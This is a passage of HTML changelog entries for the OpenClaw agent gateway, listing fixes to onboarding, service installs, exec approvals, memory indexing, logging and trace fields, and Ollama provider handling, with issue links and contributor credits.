<li>Onboarding/GitHub Copilot: add manifest-owned <code>--github-copilot-token</code> support for non-interactive setup, including env fallback, tokenRef storage in ref mode, saved-profile reuse, and current Copilot default-model wiring. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4097444746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50002" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50002/hovercard" href="https://github.com/openclaw/openclaw/issues/50002">#50002</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4097445479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50003/hovercard" href="https://github.com/openclaw/openclaw/pull/50003">#50003</a>. Thanks @scottgl9.</li>
<li>Gateway/install: add a validated <code>--wrapper</code>/<code>OPENCLAW_WRAPPER</code> service install path that persists executable LaunchAgent/systemd wrappers across forced reinstalls, updates, and doctor repairs instead of falling back to raw node/bun <code>ProgramArguments</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297397474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69400/hovercard" href="https://github.com/openclaw/openclaw/issues/69400">#69400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332409419" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72445" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72445/hovercard" href="https://github.com/openclaw/openclaw/pull/72445">#72445</a>) Thanks @willtmc.</li>
<li>Plugins: fail plugin registration when loader-owned acceptance gates reject missing hook names or memory-only capability registration from non-memory plugins, surfacing the issue through plugin status and doctor instead of silently dropping the registration. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332435276" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72459" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72459/hovercard" href="https://github.com/openclaw/openclaw/issues/72459">#72459</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>macOS Gateway: write launchd services with a state-dir <code>WorkingDirectory</code>, use a durable state-dir temp path instead of freezing macOS session <code>TMPDIR</code>, create that temp directory before bootstrap, and label abort-shaped launchd exits as <code>SIGABRT/abort</code> in status output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4127640305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53679" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53679/hovercard" href="https://github.com/openclaw/openclaw/issues/53679">#53679</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309815603" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70223" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70223/hovercard" href="https://github.com/openclaw/openclaw/issues/70223">#70223</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329643796" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71848/hovercard" href="https://github.com/openclaw/openclaw/issues/71848">#71848</a>. Thanks @dlturock, @stammi922, and @palladius.</li>
<li>Control UI/update: make <code>Update now</code> require a real gateway process replacement, report skipped/error update outcomes with stable reasons, and verify the running gateway version after restart so global installs cannot silently keep old code in memory. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217678354" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62492" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62492/hovercard" href="https://github.com/openclaw/openclaw/issues/62492">#62492</a>; addresses <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245063393" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64892" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64892/hovercard" href="https://github.com/openclaw/openclaw/issues/64892">#64892</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229612858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63562" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63562/hovercard" href="https://github.com/openclaw/openclaw/issues/63562">#63562</a>. Thanks @IAMSamuelRodda.</li>
<li>Exec approvals: accept runtime-owned <code>source: "allow-always"</code> and <code>commandText</code> allowlist metadata in gateway and node approval-set payloads so Control UI round-trips no longer fail with <code>unexpected property 'source'</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197832508" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60000/hovercard" href="https://github.com/openclaw/openclaw/issues/60000">#60000</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198205333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60064" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60064/hovercard" href="https://github.com/openclaw/openclaw/pull/60064">#60064</a>. Thanks @sd1471123, @sharkqwy, and @luoyanglang.</li>
<li>Exec/node: skip approval-plan preparation for full-trust <code>host=node</code> runs so interpreter and script commands no longer fail with <code>SYSTEM_RUN_DENIED: approval cannot safely bind</code> when effective policy is <code>security=full</code> and <code>ask=off</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084375630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48457" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48457/hovercard" href="https://github.com/openclaw/openclaw/issues/48457">#48457</a> and duplicate <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293866252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69251" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69251/hovercard" href="https://github.com/openclaw/openclaw/issues/69251">#69251</a>. Thanks @ajtran303, @jaserNo1, @Blakeshannon, @lesliefag, and @AvIsBeastMC.</li>
<li>Exec/node: synthesize a local approval plan when a paired node advertises <code>system.run</code> without <code>system.run.prepare</code>, unblocking approval-required <code>host=node</code> exec on current macOS companion nodes while preserving remote prepare for node hosts that support it. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4033313008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37591" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37591/hovercard" href="https://github.com/openclaw/openclaw/issues/37591">#37591</a> and duplicate <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265048569" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66839/hovercard" href="https://github.com/openclaw/openclaw/issues/66839">#66839</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303037278" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69725" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69725/hovercard" href="https://github.com/openclaw/openclaw/pull/69725">#69725</a>. Thanks @soloclz.</li>
<li>Memory/QMD: prefer QMD's <code>--mask</code> collection pattern flag so root memory indexing stays scoped to <code>MEMORY.md</code> instead of widening to every markdown file in the workspace. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4249056416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65480/hovercard" href="https://github.com/openclaw/openclaw/issues/65480">#65480</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4249056746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65481" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65481/hovercard" href="https://github.com/openclaw/openclaw/pull/65481">#65481</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258914603" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66259" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66259/hovercard" href="https://github.com/openclaw/openclaw/pull/66259">#66259</a>. Thanks @ccage-simp, @Bortlesboat, @seank-com, and @crazyscience.</li>
<li>Memory/doctor: treat the specific <code>gateway timeout after ...</code> gateway memory probe result as inconclusive instead of reporting embeddings not ready, while preserving warnings for explicit failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067725204" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44426/hovercard" href="https://github.com/openclaw/openclaw/issues/44426">#44426</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076741219" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46576" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46576/hovercard" href="https://github.com/openclaw/openclaw/pull/46576">#46576</a> with the Greptile review feedback applied. Thanks Cengiz (@ghost).</li>
<li>Gateway/startup: defer QMD, core request handlers, setup wizard, CLI outbound senders, plugin HTTP routes, chat/session projection, node session runtime validation, embedded-run activity reads, MCP loopback server imports, channel runtime helpers, HTTP/canvas/plugin auth helpers, isolated cron imports, and hook dispatch parsing until their request or shutdown paths, while making plain <code>gateway status</code> use a parse-only config snapshot so no-plugin boots and status reads avoid broad runtime fanout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Lobster/Gateway: memoize repeated Ajv schema compilation before loading the embedded Lobster runtime so scheduled workflows and <code>llm.invoke</code> loops stop growing gateway heap on content-identical schemas. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323825705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71148" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71148/hovercard" href="https://github.com/openclaw/openclaw/issues/71148">#71148</a>. Thanks @cmi525, @vsolaz, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness: normalize cached input tokens before session/context accounting so prompt cache reads are not double-counted in <code>/status</code>, <code>session_status</code>, or persisted <code>sessionEntry.totalTokens</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294939319" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69298/hovercard" href="https://github.com/openclaw/openclaw/issues/69298">#69298</a>. Thanks @richardmqq.</li>
<li>Hooks/session-memory: use the host local timezone for memory filenames, fallback timestamp slugs, and markdown headers instead of UTC dates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077284827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46703" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46703/hovercard" href="https://github.com/openclaw/openclaw/issues/46703">#46703</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077318445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46721/hovercard" href="https://github.com/openclaw/openclaw/pull/46721">#46721</a>) Thanks @Astro-Han.</li>
<li>Gateway health: preserve live runtime-backed channel/account state in <code>gateway.health</code> snapshots and cached refreshes while keeping raw probe payloads on sensitive/admin paths only. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041371133" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39921" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39921/hovercard" href="https://github.com/openclaw/openclaw/pull/39921">#39921</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054923925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42586" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42586/hovercard" href="https://github.com/openclaw/openclaw/pull/42586">#42586</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076534390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46527" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46527/hovercard" href="https://github.com/openclaw/openclaw/pull/46527">#46527</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4119683274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52770" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/52770/hovercard" href="https://github.com/openclaw/openclaw/pull/52770">#52770</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054579227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42543" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42543/hovercard" href="https://github.com/openclaw/openclaw/pull/42543">#42543</a>) Thanks @FAL1989, @rstar327, @0xble, and @ajayr.</li>
<li>Feishu: extract quoted/replied interactive-card text across schema 1.0, schema 2.0, i18n, template-variable, and post-format fallback shapes without carrying broad generated/config churn from related parser experiments. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038206905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38776" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/38776/hovercard" href="https://github.com/openclaw/openclaw/pull/38776">#38776</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4201051829" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60383" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60383/hovercard" href="https://github.com/openclaw/openclaw/pull/60383">#60383</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052134122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42218/hovercard" href="https://github.com/openclaw/openclaw/pull/42218">#42218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075296473" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/45936/hovercard" href="https://github.com/openclaw/openclaw/pull/45936">#45936</a>) Thanks @lishuaigit, @lskun, @just2gooo, and @Br1an67.</li>
<li>Telegram/agents: hide raw failed write/edit warning messages in Telegram when the assistant already explicitly acknowledges the failed action, while keeping warnings when the reply claims success or omits the failure; <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040278873" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39406" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39406/hovercard" href="https://github.com/openclaw/openclaw/issues/39406">#39406</a> remains the broader configurable delivery-policy follow-up. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107998150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51065" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51065/hovercard" href="https://github.com/openclaw/openclaw/issues/51065">#51065</a>; covers <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040841536" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39631/hovercard" href="https://github.com/openclaw/openclaw/issues/39631">#39631</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a> and @Bortlesboat.</li>
<li>Exec approvals: accept a symlinked <code>OPENCLAW_HOME</code> as the trusted approvals root while still rejecting symlinked <code>.openclaw</code> path components below it. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243267118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64663" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64663/hovercard" href="https://github.com/openclaw/openclaw/pull/64663">#64663</a>) Thanks @FunJim.</li>
<li>Logging: add top-level <code>hostname</code>, flattened <code>message</code>, and available <code>agent_id</code>, <code>session_id</code>, and <code>channel</code> fields to file-log JSONL records for multi-agent filtering without removing existing structured log arguments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108127045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51075/hovercard" href="https://github.com/openclaw/openclaw/issues/51075">#51075</a>. Thanks @stevengonsalvez.</li>
<li>ACP: route server logs to stderr before Gateway config/bootstrap work so ACP stdout remains JSON-RPC only for IDE integrations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4088925593" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49060/hovercard" href="https://github.com/openclaw/openclaw/issues/49060">#49060</a>. Thanks @Hollychou924.</li>
<li>Logging: propagate internal request trace scopes through Gateway HTTP requests and WebSocket frames so file logs, diagnostic events, agent run traces, model-call traces, OTEL spans, and trusted provider <code>traceparent</code> headers share a correlatable <code>traceId</code> without logging raw request or model content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042435480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40353" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40353/hovercard" href="https://github.com/openclaw/openclaw/issues/40353">#40353</a>. Thanks @liangruochong44-ui.</li>
<li>Diagnostics/OTEL: capture privacy-safe model-call request payload bytes, streamed response bytes, first-response latency, and total duration in diagnostic events, plugin hooks, stability snapshots, and OTEL model-call spans/metrics without logging raw model content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4019760959" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33832/hovercard" href="https://github.com/openclaw/openclaw/issues/33832">#33832</a>. Thanks @wwh830.</li>
<li>Logging: write validated diagnostic trace context as top-level <code>traceId</code>, <code>spanId</code>, <code>parentSpanId</code>, and <code>traceFlags</code> fields in file-log JSONL records so traced requests and model calls are easier to correlate in log processors. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042435480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40353" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40353/hovercard" href="https://github.com/openclaw/openclaw/issues/40353">#40353</a>. Thanks @liangruochong44-ui.</li>
<li>Logging/sessions: apply configured redaction patterns to persisted session transcript text and accept escaped character classes in safe custom redaction regexes, so transcript JSONL no longer keeps matching sensitive text in the clear. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056740716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42982/hovercard" href="https://github.com/openclaw/openclaw/issues/42982">#42982</a>. Thanks @panpan0000.</li>
<li>Agents/sessions: let <code>sessions_spawn runtime="subagent"</code> ignore ACP-only <code>streamTo</code> and <code>resumeSessionId</code> fields while keeping ACP passthrough and documenting <code>streamTo</code> as ACP-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061499254" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43556" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43556/hovercard" href="https://github.com/openclaw/openclaw/issues/43556">#43556</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4224020997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63120/hovercard" href="https://github.com/openclaw/openclaw/issues/63120">#63120</a>; covers <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4159060112" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56326" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56326/hovercard" href="https://github.com/openclaw/openclaw/issues/56326">#56326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210049383" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61724" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61724/hovercard" href="https://github.com/openclaw/openclaw/issues/61724">#61724</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243766641" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64714" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64714/hovercard" href="https://github.com/openclaw/openclaw/issues/64714">#64714</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269747849" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67248" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67248/hovercard" href="https://github.com/openclaw/openclaw/issues/67248">#67248</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286646321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68397" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68397/hovercard" href="https://github.com/openclaw/openclaw/pull/68397">#68397</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4247437331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65282" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65282/hovercard" href="https://github.com/openclaw/openclaw/pull/65282">#65282</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183666554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58686" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58686/hovercard" href="https://github.com/openclaw/openclaw/pull/58686">#58686</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4159218513" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56342" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56342/hovercard" href="https://github.com/openclaw/openclaw/pull/56342">#56342</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041738951" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40102" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40102/hovercard" href="https://github.com/openclaw/openclaw/pull/40102">#40102</a>. Thanks @skernelx, @damselem, @Br1an67, @Mintalix, @IsaacAPerez, @vvitovec, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>, @shenkq97, and @1034378361.</li>
<li>Providers/Ollama: honor <code>/api/show</code> capabilities, custom Modelfile <code>PARAMETER num_ctx</code>, configured provider/model context defaults, whitelisted native params such as <code>temperature</code>, <code>top_p</code>, and <code>think</code>, and native thinking effort levels so local models get accurate tools, context, and thinking behavior without forcing full-context VRAM use. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243652449" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64710" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64710/hovercard" href="https://github.com/openclaw/openclaw/issues/64710">#64710</a>, duplicate <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4247974485" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65343" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65343/hovercard" href="https://github.com/openclaw/openclaw/issues/65343">#65343</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286116014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68344" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68344/hovercard" href="https://github.com/openclaw/openclaw/issues/68344">#68344</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068385205" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44550/hovercard" href="https://github.com/openclaw/openclaw/issues/44550">#44550</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115724405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52206/hovercard" href="https://github.com/openclaw/openclaw/issues/52206">#52206</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093765160" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49684" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49684/hovercard" href="https://github.com/openclaw/openclaw/issues/49684">#49684</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288813407" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68662" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68662/hovercard" href="https://github.com/openclaw/openclaw/issues/68662">#68662</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080851654" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48010" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48010/hovercard" href="https://github.com/openclaw/openclaw/issues/48010">#48010</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328145755" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71584" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71584/hovercard" href="https://github.com/openclaw/openclaw/issues/71584">#71584</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069340291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44786" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44786/hovercard" href="https://github.com/openclaw/openclaw/issues/44786">#44786</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298714503" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69464" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69464/hovercard" href="https://github.com/openclaw/openclaw/pull/69464">#69464</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4070089946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44955" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44955/hovercard" href="https://github.com/openclaw/openclaw/pull/44955">#44955</a>. Thanks @yuan-b, @netherby, @xilopaint, @Diyforfun2026, @neeravmakwana, @taitruong, @armi0024, @LokiCode404, @zhouZcong, @dshenster-byte, @tangzhi, @pandego, @maweibin, @Adam-Researchh, @EmpireCreator, @g0st1n, and @voltwake.</li>
<li>Image tool/media: honor <code>tools.media.image.timeoutSeconds</code> and matching per-model image timeouts in explicit image analysis, including the MiniMax VLM fallback path, so slow local vision models are not capped by hardcoded 30s/60s aborts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279519640" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67889" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67889/hovercard" href="https://github.com/openclaw/openclaw/issues/67889">#67889</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279773642" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67929" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67929/hovercard" href="https://github.com/openclaw/openclaw/pull/67929">#67929</a>. Thanks @AllenT22 and @alchip.</li>
<li>Providers/Ollama: strip custom provider prefixes before native chat/embedding requests, skip ambient localhost discovery unless config/auth opts in, handle custom remote <code>api: "ollama"</code> providers, accept OpenAI SDK-style <code>baseURL</code>, scope synthetic local auth and embedding bearer headers to declared host boundaries, resolve custom-named local providers for subagents, add provider-scoped model request timeouts, preserve explicit input modalities, and document <code>params.keep_alive</code> plus local/LAN/cloud/multi-host/web-search/embedding/thinking setup recipes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331946087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72353" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72353/hovercard" href="https://github.com/openclaw/openclaw/issues/72353">#72353</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163674492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56939" 